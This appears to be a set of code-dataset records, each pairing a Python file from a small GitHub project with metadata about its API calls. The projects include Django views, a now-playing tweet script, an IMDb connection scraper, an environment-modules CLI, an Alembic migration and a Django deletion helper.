"usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 953, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 989, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 989, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 990, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 996, "usage_type": "call"}, {"api_name": "os.path", "line_number": 996, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 997, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1020, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1020, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 1037, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 1041, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 1079, "usage_type": "call"}, {"api_name": "platform.python_version", "line_number": 1079, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 1084, "usage_type": "attribute"}, {"api_name": "platform.python_version", "line_number": 1085, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 1086, "usage_type": "call"}, {"api_name": "filtering.read_exclude", "line_number": 1090, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 1092, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 1096, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1096, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 1097, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 1099, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 1104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1104, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1129, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 1164, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1190, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 1191, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 1193, "usage_type": "name"}, {"api_name": "subprocess.call", "line_number": 1213, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 1219, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 1222, "usage_type": "call"}]} +{"seq_id": "73829928166", "text": "# from django.shortcuts import render\n\n# Create your views here.\n\n\n\n# from django.shortcuts import render\n\n# Create your views here.\n\n# -----(其他)---------\n# 時間需要\nfrom datetime import datetime\nfrom re import template\n# 用 model\nfrom app2.models import Post, Product\n# ---------------------------------------\n## 寫法<2> 使用 render 直接簡短渲染寫法\nfrom django.shortcuts import render\n## render 與底下的 HttpResponse 將會將\n## templete 抓來用,再回傳給使用者\n# ----------------------------------------\n ## 寫法<3> 使用到 get_template & HttpResponse\n ## 當你這個 view 有很多 templete 時候 get_template 可以幫你選版 通常是中間的 base.html\n ## 再用 HttpResponse(html) 去把你要的畫面拼出來\nfrom django.template.loader import get_template\nfrom django.http import HttpResponse\n##################################\n# Create your views here. #\n##################################\n## 寫法<1> 直接印 html\ndef pageApp2(request):\n html = '''\n

    This is a test page App2....

    \n

    ~~~~~~~~~~~~~~~~~~~~~~~~

    \n
    \n

    tryyyyyyyyyyyyyyyyyyy

    \n \n \n
    \n
    \n

    TEST

    \n '''\n link_admin = True\n if link_admin:\n template = get_template('index.html')\n content_posts = Post.objects.all()\n now = datetime.now()\n html = template.render(locals())\n return HttpResponse(html)\n else:\n return HttpResponse(html)\n\n# \"\"\"\n\nclass BaseHtmlTemplate:\n # step1\n def __init__(self, link_admin, html, SourceTemplat):\n self.link_admin = True\n self.html = ''\n self.SourceTemplat = 'index.html'\n\n self.link_admin = link_admin\n self.html = html\n if SourceTemplat != '':\n self.SourceTemplat = SourceTemplat\n # step3 (run it from outsite)\n # base template\n def exc_render(self):\n html = self.html\n if self.link_admin:\n # template = get_template('index.html')\n SourceTemplat = self.SourceTemplat\n template = get_template(SourceTemplat)\n # content_posts = Product.objects.all()\n # now = datetime.now()\n Dictlocals = locals()\n self.GetContent()\n Dictlocals.update(self.dictUpdateValue)\n # html = template.render(locals())\n html = template.render(Dictlocals)\n # print(Dictlocals)\n # return HttpResponse(html)\n else:\n # return HttpResponse(html)\n pass\n self.html = html\n # step2 (don't use it from outsite)\n # DLC\n def GetContent(self):\n content_posts = Product.objects.all()\n # content_posts = Product.objects.all()[:2]\n now = datetime.now()\n dictUpdateValue = {\n \"content_posts\" : content_posts,\n \"now\" : now\n }\n self.dictUpdateValue = dictUpdateValue\n def get_render_result(self):\n return self.html\n# 繼承上面的 class 並且可以覆蓋繼承的方法 (def 取相同名稱)\nclass NeoHtmlTemplate(BaseHtmlTemplate):\n # def GetContent(self):\n # return super().GetContent()\n\n def GetContent(self):\n # content_posts = Product.objects.all()\n content_posts = Product.objects.all()[:2]\n now = datetime.now()\n dictUpdateValue = {\n \"content_posts\" : content_posts,\n \"now\" : now\n }\n self.dictUpdateValue = dictUpdateValue\n\nclass FormTemplate(BaseHtmlTemplate):\n def GetContent(self):\n if self.request.method == 'POST':\n message = ''\n else:\n message = f\"感謝您的來信; 傳值方式為 : {self.request.method}\"\n log = \"\"\"\n 原本要用 form 的範例簡單寫個 app 但沒寫完 (目前還只能在 view 內傳值,且 POST 未能傳值成功\n
    \n 這網頁渲染的有夠差,之後還要套模板。\n \"\"\"\n dictUpdateValue = {\n \"message\" : message,\n \"Log\" : log,\n \"user_name\" : \"Andy6\",\n \"user_city\" : \"user city\",\n \"user_school\" : \"NCHU\",\n \"user_email\" : \"XXX@gmail.com\",\n \"user_message\" : \"Talk ........\",\n }\n self.dictUpdateValue = dictUpdateValue \n\n# 物件寫出來了底下的 def 可以刪除了\ndef repeat_code(link_admin=True, html='', SourceTemplat='index.html', List = []):\n \n if link_admin:\n # template = get_template('index.html')\n\n template = get_template(SourceTemplat)\n content_posts = Product.objects.all()\n now = datetime.now()\n html = template.render(locals())\n # return HttpResponse(html)\n else:\n # return HttpResponse(html)\n pass\n return html\n# \"\"\"\ndef ntab1(request):\n html = '''\n

    製作比先前測試頁再正式一點點點....的網頁 (維護中)

    \n '''\n link_admin = True\n # SourceTemplat = 'try_bootstrap.html'\n SourceTemplat = 'index.html'\n\n BaseTemplate = True\n if BaseTemplate: \n MyObjTemplat = BaseHtmlTemplate(link_admin, html, SourceTemplat)\n else:\n MyObjTemplat = NeoHtmlTemplate(link_admin, html, SourceTemplat)\n MyObjTemplat.exc_render()\n html = MyObjTemplat.get_render_result()\n\n # html = repeat_code(link_admin, html, SourceTemplat)\n\n ## template = get_template(SourceTemplat)\n ## html = template.render(locals())\n return HttpResponse(html)\n\n# \"\"\"\nimport random\ndef about(request):\n quotes = [\n '今日事,今日畢',\n '要怎麼收穫,先怎麼栽',\n '知識就是力量',\n '一個人的個性就是他的命運'\n ]\n quote = random.choice(quotes)\n return render(request, 'about.html', locals())\n\n\ndef LISTING(request, yr, mon, day):\n html = \"

    List Date is {}/{}/{}


    \".format(yr, mon, day)\n return HttpResponse(html)\n\ndef listing(request):\n html = '''\n

    django 變數傳值 : 維護中 !!!!

    \n '''\n # print(html)\n\n link_admin = True\n SourceTemplat = ''\n SourceTemplat = 'contact.html'\n # html = repeat_code(link_admin, html)\n\n BaseTemplate = False\n if BaseTemplate: \n MyObjTemplat = BaseHtmlTemplate(link_admin, html, SourceTemplat)\n else:\n MyObjTemplat = FormTemplate(link_admin, html, SourceTemplat)\n MyObjTemplat.request = request\n MyObjTemplat.exc_render()\n html = MyObjTemplat.get_render_result()\n print(html)\n\n\n return HttpResponse(html)\n\ndef bootstrap(request):\n html = '''\n

    bootstrap 模板套用 : 維護中 !!!!

    \n '''\n link_admin = True\n # SourceTemplat = 'try_bootstrap.html'\n SourceTemplat = 'Bbase.html'\n # MyObjTemplat = BaseHtmlTemplate(link_admin, html, SourceTemplat)\n # MyObjTemplat.exc_render()\n # html = MyObjTemplat.get_render_result()\n\n MyObjTemplat = NeoHtmlTemplate(link_admin, html, SourceTemplat)\n MyObjTemplat.exc_render()\n html = MyObjTemplat.get_render_result()\n\n # html = repeat_code(link_admin, html, SourceTemplat)\n\n ## template = get_template(SourceTemplat)\n ## html = template.render(locals())\n return HttpResponse(html)\n\n\n### 寫法<2> 使用 render 渲染\n#def homepage(request):\n# content_posts = Post.objects.all()\n # content_posts = Post.objects.all()[0:3] ## 選取 list 裡面幾個\n# now = datetime.now()\n# return render(request, 'index.html', locals())\n# --------------------------------------------------------\n## 寫法<3> 透過 html 去印出\n", "repo_name": "ESSO0428/230111_django_class", "sub_path": "myFirstTemplate_230226/app2/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7902, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.template", "line_number": 46, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 46, "usage_type": "call"}, {"api_name": "app2.models.Post.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "app2.models.Post.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "app2.models.Post", "line_number": 47, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "re.template.render", "line_number": 49, "usage_type": "call"}, {"api_name": "re.template", "line_number": 49, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "re.template", "line_number": 74, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 74, "usage_type": "call"}, {"api_name": "re.template.render", "line_number": 81, "usage_type": "call"}, {"api_name": "re.template", "line_number": 81, "usage_type": "name"}, {"api_name": "app2.models.Product.objects.all", "line_number": 91, "usage_type": "call"}, {"api_name": "app2.models.Product.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "app2.models.Product", "line_number": 91, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 93, "usage_type": "name"}, {"api_name": "app2.models.Product.objects.all", "line_number": 108, "usage_type": "call"}, {"api_name": "app2.models.Product.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "app2.models.Product", "line_number": 108, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 109, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 109, "usage_type": "name"}, {"api_name": "re.template", "line_number": 144, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 144, "usage_type": "call"}, {"api_name": "app2.models.Product.objects.all", "line_number": 145, "usage_type": "call"}, {"api_name": "app2.models.Product.objects", "line_number": 145, "usage_type": "attribute"}, {"api_name": "app2.models.Product", "line_number": 145, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 146, "usage_type": "name"}, {"api_name": "re.template.render", "line_number": 147, "usage_type": "call"}, {"api_name": "re.template", "line_number": 147, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 174, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 185, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 186, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 191, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 215, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 236, "usage_type": "call"}]} +{"seq_id": "40592916448", "text": "#!/usr/bin/env python3.5\n\nfrom objc_util import *\nimport twitter\nimport dialogs\n\n# Music Controller\n\nMPController = ObjCClass('MPMusicPlayerController')\nplayer = MPController.systemMusicPlayer()\nnowPlaying = player.nowPlayingItem()\n\n# Twitter setup\n\ntAccts = twitter.get_all_accounts()\nif len(tAccts) >= 1:\n\tacct = tAccts[0]\nelse:\n\tNone\n\n# Return artist/song, post\n\nif nowPlaying:\n\tartist = nowPlaying.valueForProperty_('artist')\n\ttitle = nowPlaying.valueForProperty_('title')\n\n\tNP = '#NowPlaying: %s - \"%s\"' % (artist, title)\n\t\n\tcheckPost = dialogs.alert('#NowPlaying', 'Currently playing: %s - \"%s\"' % (artist, title) + '. Tweet it?', 'Nope', 'Tweet', hide_cancel_button=True)\n\t\n\tif checkPost == 2:\n\t\ttwitter.post_tweet(acct, NP)\n\t\tdialogs.alert('#NowPlaying', 'Posted', 'Okay', hide_cancel_button=True)\n\telif checkPost == 1:\n\t\tdialogs.alert('#NowPlaying', 'Canceled', 'Okay', hide_cancel_button=True)\n", "repo_name": "bvon/NowPlaying", "sub_path": "NowPlaying.py", "file_name": "NowPlaying.py", "file_ext": "py", "file_size_in_byte": 904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "twitter.get_all_accounts", "line_number": 15, "usage_type": "call"}, {"api_name": "dialogs.alert", "line_number": 29, "usage_type": "call"}, {"api_name": "twitter.post_tweet", "line_number": 32, "usage_type": "call"}, {"api_name": "dialogs.alert", "line_number": 33, "usage_type": "call"}, {"api_name": "dialogs.alert", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "20500628387", "text": "\"\"\"\nA script that finds the connections of a movie and sorts them according to\ntheir ranking.\n\"\"\"\nfrom movies import *\nfrom requests import Session\nimport cProfile\nimport pstats\nimport sys\nimport httpx\nimport asyncio\nimport csv\n\n\nsmovies = set()\nuactors = set()\n\nwith open('history.csv', newline = '') as f:\n data = csv.reader(f)\n for row in data:\n smovies.add(row[0].strip())\n uactors.add(row[1].strip())\n\n\nasync def get_connections(movie):\n \"\"\"\n Get a set of movie codes that connect with a given movie.\n\n Input:\n - movie: A movie code from which a movies.Movie() object can be created.\n\n Outpt:\n - c: a set() of connections.\n \"\"\"\n movie = Movie(movie)\n movie.get_cast()\n print(movie.name)\n cast = set(movie.cast_urls)\n available = cast - uactors\n\n c = set()\n\n url = 'https://www.imdb.com/name/{}/?req_=fn_al_1'\n header = {'Accept-Language': 'en-US'}\n\n async with httpx.AsyncClient() as client:\n #tasks = (Actor(code) for code in movie.cast_urls)\n tasks = (client.get(url.format(code), headers = header) for code in available)\n reqs = await asyncio.gather(*tasks)\n\n actors = [Actor(html = resp.content) for resp in reqs]\n for actor in actors:\n #print(actor.name)\n actor.extract_movies()\n for k, v in actor.jobs.items():\n c.add(k)\n c = c - smovies\n\n return c\n\n\nasync def sort_connections(movie_set):\n \"\"\"\n Sort a set of movie codes according to their movie scores in IMDB.\n\n Input:\n - movie_set: A set of movie codes.\n\n Output:\n - None\n \"\"\"\n url = 'https://www.imdb.com/title/{}/?req_=fn_al_1'\n header = {'Accept-Language': 'en-US'}\n movie_set = list(movie_set)\n movies = []\n ii = 1\n\n while movie_set:\n print(f'On round {ii}.')\n cs = 5\n cms = movie_set[:cs]\n del movie_set[:cs]\n async with httpx.AsyncClient() as client:\n tasks = (client.get(url.format(code), headers = header) for code in cms)\n reqs = await asyncio.gather(*tasks)\n cmovies = [Movie(html = resp.content) for resp in reqs]\n movies.extend(cmovies)\n ii += 1\n print('Finished making movies.')\n\n #movies = [Movie(html = resp.content) for resp in reqs]\n for movie in movies:\n #print(movie.name)\n movie.get_score()\n\n movies.sort()\n print(movies)\n return movies\n\n\ndef writeout(movie_set):\n \"\"\"\n Write out the connections as a file with two columns, indicating name and\n ranking.\n \"\"\"\n with open(\"possibilities.txt\", \"w\") as f:\n f.write(\"Title, Score\\n\")\n for movie in movie_set:\n f.write(f\"{movie.name}, {movie.score}\\n\")\n\ndef main():\n movie = sys.argv[1]\n\n with cProfile.Profile() as pr:\n conn_set = asyncio.run(get_connections(movie))\n #conn_set = set(list(conn_set)[:10])\n conn_set = asyncio.run(sort_connections(conn_set))\n \n stats = pstats.Stats(pr)\n stats.sort_stats(pstats.SortKey.TIME)\n stats.dump_stats(filename = 'conn.prof')\n\n writeout(conn_set)\n\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "rodrigo-moreno/movie_net", "sub_path": "get_connections.py", "file_name": "get_connections.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 19, "usage_type": "call"}, {"api_name": "httpx.AsyncClient", "line_number": 46, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 49, "usage_type": "call"}, {"api_name": "httpx.AsyncClient", "line_number": 83, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 85, "usage_type": "call"}, {"api_name": "movies.extend", "line_number": 87, "usage_type": "call"}, {"api_name": "movies.sort", "line_number": 96, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 112, "usage_type": "attribute"}, {"api_name": "cProfile.Profile", "line_number": 114, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 115, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 117, "usage_type": "call"}, {"api_name": "pstats.Stats", "line_number": 119, "usage_type": "call"}, {"api_name": "pstats.SortKey", "line_number": 120, "usage_type": "attribute"}]} +{"seq_id": "73388360165", "text": "import os\nimport platform\nimport sys\nimport argparse\n\nimport Utils.IO\nfrom Utils.Path import getPathVar\nfrom Shell.Shell import getShell\nimport Parser\nimport Actions\n\ndef printHelp():\n pout = Utils.IO.printErr\n pout(\"(Python) Environment Modules\")\n pout(\"Version 0.1\")\n pout(\"http://github.com/lrm29/pythonEnvModules\")\n\ndef main(args):\n try:\n parser = argparse.ArgumentParser(description=\"Load environment to terminal\")\n parser.add_argument(\"--shell\", dest=\"shellType\", help=\"Specify the shell type\")\n parser.add_argument(\"actionType\", nargs=1, help=\"Action to perform\")\n parser.add_argument(\"moduleFile\", nargs='?', default='', help=\"Module file to read in\")\n parser.add_argument(\"moduleFileSwap\", nargs='?', default='', help=\"Module file to swap with\")\n args = parser.parse_args()\n\n shell = getShell(args.shellType)\n action = args.actionType[0]\n\n # Print help message\n if action.startswith(\"h\"):\n printHelp()\n return 0\n\n # Process actions\n if action.startswith(\"li\"):\n actionList = Actions.List()\n\n elif action.startswith(\"av\"):\n actionAvailable = Actions.Available()\n\n elif action.startswith(\"wh\"):\n specificModuleFile = args.moduleFile\n actionAvailable = Actions.WhatIs(specificModuleFile)\n\n elif action.startswith(\"sh\"):\n moduleFile = args.moduleFile\n variableData = Parser.VariableData()\n actionShow = Actions.Show(shell, variableData, moduleFile)\n\n elif action.startswith(\"use\"):\n pathToUse = args.moduleFile\n actionUse = Actions.Use(\"ENV_MODULES_PATH\", pathToUse, shell)\n\n elif action.startswith(\"unuse\"):\n pathToUnUse = args.moduleFile\n actionUnuse = Actions.Unuse(\"ENV_MODULES_PATH\", pathToUnUse, \"ENV_MODULES_LOADED\", shell)\n\n elif action.startswith(\"load\"):\n moduleFile = args.moduleFile\n variableData = Parser.VariableData()\n actionLoad = Actions.Load(shell, variableData, moduleFile)\n\n elif action.startswith(\"unload\"):\n moduleFile = args.moduleFile\n variableData = Parser.VariableData()\n actionUnload = Actions.Unload(shell, variableData, moduleFile)\n\n elif action.startswith(\"sw\"):\n moduleFileToUnload = args.moduleFile\n variableData = Parser.VariableData()\n actionUnload = Actions.Unload(shell, variableData, moduleFileToUnload)\n\n moduleFileToLoad = args.moduleFileSwap\n variableData = Parser.VariableData()\n actionLoad = Actions.Load(shell, variableData, moduleFileToLoad)\n\n elif action.startswith(\"re\"):\n moduleFileToUnload = args.moduleFile\n variableData = Parser.VariableData()\n actionUnload = Actions.Unload(shell, variableData, moduleFileToUnload)\n\n moduleFileToLoad = args.moduleFile\n variableData = Parser.VariableData()\n actionLoad = Actions.Load(shell, variableData, moduleFileToLoad)\n\n else:\n Utils.IO.printErr(\"Unknown action \" + action)\n return 1\n\n except:\n return 1 # exit on error\n else:\n return 0 # exit errorlessly\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n\n", "repo_name": "lrm29/pythonEnvModules", "sub_path": "src/pythonenvmodules.py", "file_name": "pythonenvmodules.py", "file_ext": "py", "file_size_in_byte": 3362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Utils.IO.IO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "Utils.IO", "line_number": 13, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "Shell.Shell.getShell", "line_number": 27, "usage_type": "call"}, {"api_name": "Actions.List", "line_number": 37, "usage_type": "call"}, {"api_name": "Actions.Available", "line_number": 40, "usage_type": "call"}, {"api_name": "Actions.WhatIs", "line_number": 44, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 48, "usage_type": "call"}, {"api_name": "Actions.Show", "line_number": 49, "usage_type": "call"}, {"api_name": "Actions.Use", "line_number": 53, "usage_type": "call"}, {"api_name": "Actions.Unuse", "line_number": 57, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 61, "usage_type": "call"}, {"api_name": "Actions.Load", "line_number": 62, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 66, "usage_type": "call"}, {"api_name": "Actions.Unload", "line_number": 67, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 71, "usage_type": "call"}, {"api_name": "Actions.Unload", "line_number": 72, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 75, "usage_type": "call"}, {"api_name": "Actions.Load", "line_number": 76, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 80, "usage_type": "call"}, {"api_name": "Actions.Unload", "line_number": 81, "usage_type": "call"}, {"api_name": "Parser.VariableData", "line_number": 84, "usage_type": "call"}, {"api_name": "Actions.Load", "line_number": 85, "usage_type": "call"}, {"api_name": "Utils.IO.IO.printErr", "line_number": 88, "usage_type": "call"}, {"api_name": "Utils.IO.IO", "line_number": 88, "usage_type": "attribute"}, {"api_name": "Utils.IO", "line_number": 88, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 98, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 98, "usage_type": "attribute"}]} +{"seq_id": "73475836966", "text": "from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nfrom mail import views\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'cloudmail.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^$', views.home),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^test/$', views.test),\n url(r'^search/', views.result),\n\n)\n", "repo_name": "IceCoffee2013/cloudmail", "sub_path": "urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 422, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "mail.views.home", "line_number": 13, "usage_type": "attribute"}, {"api_name": "mail.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "mail.views.test", "line_number": 15, "usage_type": "attribute"}, {"api_name": "mail.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "mail.views.result", "line_number": 16, "usage_type": "attribute"}, {"api_name": "mail.views", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "12648986451", "text": "\"\"\"add table channel_type\n\nRevision ID: 11f1722d941f\nRevises: 22ced1088b04\nCreate Date: 2015-06-22 09:55:39.004203\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '11f1722d941f'\ndown_revision = '22ced1088b04'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nimport uuid\nfrom datetime import datetime\n\nchannel_type_enum = sa.Enum('web', 'sms', 'email', 'mobile', 'notification', 'twitter', 'facebook', name='channel_type_enum')\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n channel_type_enum.create(op.get_bind(), True)\n op.create_table('channel_type',\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', postgresql.UUID(), nullable=False),\n sa.Column('channel_id', postgresql.UUID(), nullable=True),\n sa.ForeignKeyConstraint(['channel_id'], [u'channel.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('channel_type', sa.Column('name', channel_type_enum, nullable=False, server_default='web', index=True))\n op.create_index('ix_channel_type_name', 'channel_type', ['name'], unique=False)\n connection = op.get_bind()\n\n result = connection.execute('select id from channel')\n for row in result:\n for type in channel_type_enum.enums:\n op.execute(\"INSERT INTO channel_type (created_at, id, channel_id, name) VALUES ('{}','{}', '{}','{}')\".\n format(datetime.utcnow(), str(uuid.uuid1()), row['id'], type))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_channel_type_name', 'channel_type')\n op.drop_table('channel_type')\n channel_type_enum.drop(op.get_bind())\n ### end Alembic commands ###\n", "repo_name": "dvdn/Chaos", "sub_path": "migrations/versions/11f1722d941f_.py", "file_name": "11f1722d941f_.py", "file_ext": "py", "file_size_in_byte": 1836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.Enum", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op.get_bind", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.create_table", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.UUID", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.UUID", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op.create_index", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 34, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 34, "usage_type": "name"}, {"api_name": "alembic.op.execute", "line_number": 39, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "uuid.uuid1", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op.drop_index", "line_number": 46, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 46, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 47, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 47, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 48, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "31695079533", "text": "from django.db.models import CASCADE\n\n\ndef CONDITIONAL_CASCADE(collector, field, sub_objs, using, **kwargs):\n \"\"\"\n Django deletion constraint that is a combination of CASCADE and SET.\n If condition (which is a dict of lookup arguemnts) is True then CASCADE\n is used, otherwise SET(default_value) is used.\n\n \"condition\" & \"default_value\" can be provided via `functools.partial` like this:\n ```\n my_field = models.ForeignKey(\n my_thing,\n on_delete=functools.partial(\n CONDITIONAL_CASCADE,\n condition={\"some_lookup_arg\": \"some_value\"},\n default_value=None,\n )\n )\n ```\n \"\"\"\n\n condition = kwargs[\"condition\"]\n default_value = kwargs.get(\"default_value\", None)\n\n sub_objs_to_cascade = sub_objs.filter(**condition)\n sub_objs_to_set = sub_objs.exclude(**condition)\n\n CASCADE(collector, field, sub_objs_to_cascade, using)\n collector.add_field_update(field, default_value, sub_objs_to_set)\n\n\ndef bulk_update_or_create(model_class, model_data, comparator_fn=None):\n \"\"\"\n Performs update_or_create in bulk (w/ only 3 db hits)\n Parameters\n 